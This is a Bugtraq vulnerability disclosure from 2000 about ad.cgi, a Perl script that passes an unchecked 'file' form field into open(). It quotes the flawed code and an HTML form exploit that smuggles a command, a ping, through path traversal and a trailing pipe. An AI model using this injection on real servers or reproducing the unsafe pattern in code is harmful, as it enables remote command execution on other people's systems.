Bugtraq mailing list archives
Insecure input validation in ad.cgi
From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 15:10:22 GMT
Hi, ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation vulnerability. Information on ad.cgi is available at: http://www.conservatives.net/atheist/scripts/index.html?ads ----code snippet---- $filename = "$FORM{'file'}"; $datafile = "$basedir" . "$filename"; ... open (INFO, "$datafile"); ----------------- Exploit: <html> <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST> <h1>ad.cgi exploit</h1> Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|"> <input type=submit value=run> </form> </html>
Current thread:
- Insecure input validation in ad.cgi rpc (Dec 13)